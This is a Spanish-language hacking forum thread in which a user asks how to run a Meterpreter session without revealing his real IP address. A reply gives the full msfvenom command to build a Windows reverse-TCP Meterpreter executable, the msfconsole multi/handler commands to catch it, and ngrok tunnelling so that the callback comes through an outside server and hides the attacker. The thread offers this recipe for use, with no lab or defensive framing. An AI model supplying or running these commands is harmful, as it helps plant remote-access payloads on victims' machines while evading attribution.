[SOLUCIONADO] Conexión meterpreter mediante proxy

Iniciado por señorrobot, Julio 06, 2018, 07:36:56 PM

Tema anterior - Siguiente tema

0 Miembros y 1 Visitante están viendo este tema.

Julio 06, 2018, 07:36:56 PM Ultima modificación: Julio 07, 2018, 02:51:13 AM por Gabriela
Alguien sabe como realizar una conexion meterpreter bajo proxy o algo que no tenga que incluir mi direccion IP real...??

Julio 06, 2018, 09:38:08 PM #1 Ultima modificación: Julio 06, 2018, 09:52:38 PM por DtxdF
@No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Te recomiendo que investigues de ngrok, Es una herramienta de tunelizacion, Que crea un servidor perteneciente a este mismo hacia una conexión a tu localhost, Podiendo así visualizar una conexión no muy rápida fuera de la red lan.

Investiga: En youtube o Google (O tu buscador), hay muchisima informacion sobre esta incrible herramienta.

Cuando lo entiendas ejecuta el siguiente comando para asi hacer un tunnel a un puerto tcp:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<ip publica (no la local)> LPORT=<puerto a usar> -f exe -o <nombre del payload>
msfconsole:

- use exploit/multi/handler
- set payload windows/meterpreter/reverse_tcp
- set lhost <tu ip>
- set lport <tu puerto>
- exploit -j

abre una consola nueva: ngrok tcp <puerto>

te cambiara la vista de la consola y te dira que url debes utilizar para lograr una conexion.

Te cambia la ip?, si haces ping <url que te da ngrok>, te muestra la ip de ese servidor y no la tuya.

Espero te sirva

- DtxdF
PGP :: <D82F366940155CB043147178C4E075FC4403BDDC>

~ DtxdF

Wow muchas gracias no habia visto tu respuesta y pregunte nuevamente . ahora mismo investigo.. gracias!!!

@No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

CitarWow muchas gracias no habia visto tu respuesta y pregunte nuevamente . ahora mismo investigo.. gracias!!!

De nada  ;)

Te recomiendo que veas datagramas de conexiones tcp's, y de metasploit (Si deseas claro).

- DtxdF
PGP :: <D82F366940155CB043147178C4E075FC4403BDDC>

~ DtxdF

Lo investigare bro, suena interesante todo esto